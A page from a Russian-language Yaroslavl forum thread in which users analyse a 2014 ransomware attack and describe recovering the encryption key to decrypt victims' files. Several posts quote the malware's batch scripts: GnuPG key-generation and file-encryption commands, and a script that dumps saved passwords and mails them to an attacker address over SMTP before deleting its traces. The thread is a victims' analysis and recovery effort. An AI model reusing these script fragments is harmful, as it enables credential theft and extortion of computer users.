Ярпортал: форум Ярославля | Совместные покупки Объявления Поиск Все вопросы: yaroslavl@bk.ru |
Здравствуйте, Гость ( Вход·Регистрация ) | Сделать Yarportal.Ru стартовой страницей |
|
Страницы: (17) « Первая ... 3 4 [5] 6 7 ... Последняя » ( Перейти к первому непрочитанному сообщению ) |
EWiZaRD |
Дата 2.06.2014 - 13:22
|
Чатланин Профиль Группа: Пользователи Сообщений: 89 Пользователь №: 41200 Регистрация: 4.09.2009 - 07:28 |
И у нас сегодня на одном компе появилось. Антивирус (SCEP) пропустил.
Повезло, удалось восстановить содержимое удаленного файла секретных ключей (secring.gpg) с диска. Сейчас сижу, жду, пока скрипт расшифровки отработает. У кого файлы зашифровались, советую выключить комп, чтобы шанс затереть нужные сектора был меньше. Чуть позже напишу, как я искал, может и у вас получится Это сообщение отредактировал EWiZaRD - 3.06.2014 - 08:29 |
satanic |
Дата 2.06.2014 - 13:54
|
||||
Личный пацак господина ПЖ Профиль Группа: Пользователи Сообщений: 5874 Пользователь №: 1438 Регистрация: 17.05.2004 - 14:13 |
Не исключаю такой вариант - собственно потому и интересно взглянуть на хедер письма fawkes999 это скорей "принято считать что лучшие безопасники в Тензоре" (хотя кем принято - тоже вопрос) - но сильно в этом сомневаюсь на практике... моё ИМХО! |
||||
satanic |
Дата 2.06.2014 - 14:02
|
Личный пацак господина ПЖ Профиль Группа: Пользователи Сообщений: 5874 Пользователь №: 1438 Регистрация: 17.05.2004 - 14:13 |
EWiZaRD неслыханно повезло чо ))) судя по описанию этой дряни - файлы ключей перед удалением несколько раз перезаписываются белибердой... Может ранняя версия криптора попалась?
|
EWiZaRD |
Дата 2.06.2014 - 14:28
|
Чатланин Профиль Группа: Пользователи Сообщений: 89 Пользователь №: 41200 Регистрация: 4.09.2009 - 07:28 |
Итак, как развивались события (опуская бесполезные методы и подходы )
Файл в составе вируса, создающий и удаляющий ключи - cde.cmd, из него нам интересно: %SCV%%PRB%--import "%TEMP%\secrypt.cry" %SCV%%PRB%--homedir "%TEMP%" --batch --gen-key genkey.cry %SCV%%PRB%-r StyxKey --yes --trust-model always --no-verbose -q --encrypt-files "%TEMP%\secring.gpg" ... move /y "%TEMP%\secring.gpg.gpg" "%TEMP%\secring.gpg" RENAME "%TEMP%\secring.gpg" KEY.PRIVATE т.е. ключ действительно создается каждый раз (--gen-key) и потом зашифровывается (--encrypt-files) уже безвозвратно. secring.gpg после этого перезаписывается мусором и просто так его не востановить. Файл genkey.cry удалось восстановить из удаленных (R-Studio или аналогичная). Его содержимое: %pubring pubring.gpg %secring secring.gpg Key-Type: RSA Key-Length: 1024 Name-Real: unstyx Name-Comment: unstyx Name-Email: unstyx@mail2tor.com Expire-Date: 0 Passphrase: unstyx Что сделал я: 1.Поставил себе gnupg (лучше бы, наверное, ту же верию 1.4, что и в вирусе, но поставил 2.2). 2.Сгенерил три пары ключей пользуясь genkey.cry как файлом параметров. Файл secring.gpg трижды оказался длиной 739 байт и вначале у каждого была сигнатура 0х95 0x01. Также в файле в открытом виде лежит email (unstyx@mail2tor.com). 3.Скачал disk editor, запустил поиск unstyx@mail2tor.com. Оп-па, второе же вхождение имеет 0x95 0x01 вначале и окружено 0x00. Копируем этот блок в новый файл - 738 байт. Почти-почти, может версия играет роль 2.2 vs 1.4. Кладем файл под именем secring.gpg в каталог GnuPG. gpg2 --list-secret-keys: C:/Users/EWiZaRD/AppData/Roaming/gnupg/secring.gpg ------------------------------------------------------ sec 1024R/6C1328AF 2014-06-02 uid unstyx (unstyx) <unstyx@mail2tor.com> Есть секретный ключ, мы уже рядом gpg2 --output "1.rar" --decrypt "1.rar.unstyx@gmail_com" вводим пароль (unstyx из genkey.cry) и ТА-ДА! 1.rar снова с нами. Далее дело техники. unstyx.cmd: @echo off for %%I in (*.unstyx@gmail_com) do ( gpg2 --output "%%~nI" --decrypt "%%I" del "%%I" ) sweep unstyx и можно открывать шампанское, принесенное благодарным пользователем P.S. добавлением всего двух команд в cde.cmd можно сделать так, чтобы этот и подобные подходы не сработали, но я не такой дурак, чтобы говорить об этом вслух ) Это сообщение отредактировал EWiZaRD - 2.07.2014 - 14:51 |
medorov |
Дата 2.06.2014 - 14:46
|
Апчихлырмышь Профиль Группа: Пользователи Сообщений: 2042 Пользователь №: 7514 Регистрация: 13.04.2006 - 14:47 |
EWiZaRD
Готовьтесь к заказам satanic Хедеры левые. Подпись в письме тоже. Т.е. по сути воруется адресная книга. Received: from mxfront1m.mail.yandex.net ([127.0.0.1]) by mxfront1m.mail.yandex.net with LMTP id LEOuUOUr for <***>; Fri, 30 May 2014 17:21:14 +0400 Received: from smtp4.000webhost.com (smtp4.000webhost.com [31.170.163.249]) by mxfront1m.mail.yandex.net (nwsmtp/Yandex) with ESMTP id 7WYZoX8g0R-LDHCVpts; Fri, 30 May 2014 17:21:14 +0400 X-Yandex-Front: mxfront1m.mail.yandex.net X-Yandex-TimeMark: 1401456074 X-Yandex-Uniq: ded621b0-3226-478b-af2c-8380f69b3bbb X-Yandex-Spam: 1 Received: by postlady.000webhost.com ([000webhost.com Mail Server], from userid 99) id 451BF60385; Fri, 30 May 2014 09:21:13 -0400 (EDT) X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on postlady.000webhost.com X-Spam-Level: * X-Spam-Status: No, score=1.9 required=7.0 tests=FREEMAIL_FROM,HTML_MESSAGE, HTML_MIME_NO_HTML_TAG,MIME_HTML_ONLY,RP_MATCHES_RCVD,SUBJECT_NEEDS_ENCODING, SUBJ_ILLEGAL_CHARS,TVD_RCVD_SPACE_BRACKET autolearn=disabled version=3.3.2 Received: from srv39.000webhost.com (srv39.000webhost.com [31.170.160.103]) by postlady.000webhost.com ([000webhost.com Mail Server]) with ESMTP id 276F86036C for <***>; Fri, 30 May 2014 09:21:12 -0400 (EDT) Received: by srv39.000webhost.com (Postfix, from userid 3028908) id 2551130E59E; Fri, 30 May 2014 09:21:12 -0400 (EDT) To: *** Subject: Внеплановая проверка налоговой X-PHP-Script: jkashdjas.netai.net/ for 31.170.160.110 From: =?UTF-8?B?0JzQuNGF0LDQuNC7INCh0L7Qu9C10L3QuNC60L7Qsg==?= <***@mail.ru> Subject: Внеплановая проверка налоговой MIME-Version: 1.0; Content-type: multipart/mixed; boundary="--email" Reply-To: ***@mail.ru Message-Id: <20140530132112.2551130E59E@srv39.000webhost.com> Date: Fri, 30 May 2014 09:21:12 -0400 (EDT) Return-Path: a3028908@srv39.000webhost.com X-Yandex-Forward: 75d33895443543bc12333bbfd7330a4b Это собственно второй cmd как раз отвечающий за распространение насколько я понимаю. "cd "%TEMP%" RENAME "%TEMP%\input.cry" "input.exe" RENAME "%TEMP%\javav.cry" "javav.exe" set NP=input set STX=unstyx set ml=maielr@yandex.ru set pwrd=xsenderpwd set DLEE=del %NP%.exe /stext pdw.txt ping 127.0.0.1 -n 1 javav.exe /to %STX%@gmail.com /from %ml% /subject "%COMPUTERNAME%" /port 25 /HOST smtp.yandex.ru /auth 1 /USERID %ml% /PASS "%pwrd%" /files pdw.txt :okay %DLEE%/f /q "%TEMP%\javav.exe" %DLEE%/f /q "%TEMP%\%NP%.exe" %DLEE%/f /q "%TEMP%\%NP%.cfg" %DLEE%/f /q "%TEMP%\pdw.txt" %DLEE%/f /q "%TEMP%\mlai.js" %DLEE%/f /q "%TEMP%\gr.cmd" %DLEE%/f /q %0" |
s-maxx |
Дата 2.06.2014 - 14:49
|
||
Ъ ъ ъ ъ..... Профиль Группа: Пользователи Сообщений: 13277 Пользователь №: 75105 Регистрация: 24.05.2011 - 16:59 |
Блеать, такой и по ай-пи может вычислить |
||
medorov |
Дата 2.06.2014 - 14:53
|
Апчихлырмышь Профиль Группа: Пользователи Сообщений: 2042 Пользователь №: 7514 Регистрация: 13.04.2006 - 14:47 |
Мне больше интересно, заяву кто-нибудь из пострадавших оформит в управление или как всегда?:-)
|
outsayder |
Дата 2.06.2014 - 14:54
|
The IT Crowd Профиль Группа: Пользователи Сообщений: 15873 Пользователь №: 13051 Регистрация: 14.12.2006 - 15:26 |
EWiZaRD
мое уважение ..... правильно, этому сертификаты мелкософта не учат.... Это сообщение отредактировал outsayder - 2.06.2014 - 14:54 |
satanic |
Дата 2.06.2014 - 14:57
|
||
Личный пацак господина ПЖ Профиль Группа: Пользователи Сообщений: 5874 Пользователь №: 1438 Регистрация: 17.05.2004 - 14:13 |
Плюсуюсь! ))) |
||
blessk |
Дата 2.06.2014 - 14:58
|
Unregistered |
EWiZaRD
круто! |
|
shoosha |
Дата 2.06.2014 - 15:01
|
Группа умных альпинистов обошла гору Эверест! Профиль Группа: Пользователи Сообщений: 447 Пользователь №: 55108 Регистрация: 1.08.2010 - 18:44 |
6500р попросили
|
satanic |
Дата 2.06.2014 - 15:09
|
||
Личный пацак господина ПЖ Профиль Группа: Пользователи Сообщений: 5874 Пользователь №: 1438 Регистрация: 17.05.2004 - 14:13 |
Мыло у товарища явно в дипвебе (судя по mail2tor)... для органов та еще задача поймать злодея... |
||
Razgilday |
Дата 2.06.2014 - 16:13
|
комплектатор Профиль Группа: Пользователи Сообщений: 4176 Пользователь №: 17927 Регистрация: 4.05.2007 - 09:12 |
А шифрует что? Почту, либо вообще файлы любые на компе?
|
ryab_i4 |
Дата 2.06.2014 - 16:17
|
||
Чатланин Профиль Группа: Пользователи Сообщений: 37 Пользователь №: 66685 Регистрация: 2.02.2011 - 15:19 |
*.jpg, *.doc(x), *.xls(x), *.zip, *.rar, *.pdf добавляет расширение например: *.pdf.unstyx@gmail_com Это сообщение отредактировал ryab_i4 - 2.06.2014 - 16:29 |
||
ТО)(@ |
Дата 2.06.2014 - 16:19
|
Paranoid Профиль Группа: Пользователи Сообщений: 13322 Пользователь №: 72895 Регистрация: 20.04.2011 - 13:42 |
офисные крысы!
|
Страницы: (17) « Первая ... 3 4 [5] 6 7 ... Последняя » |
Правила Ярпортала (включая политику обработки персональных данных)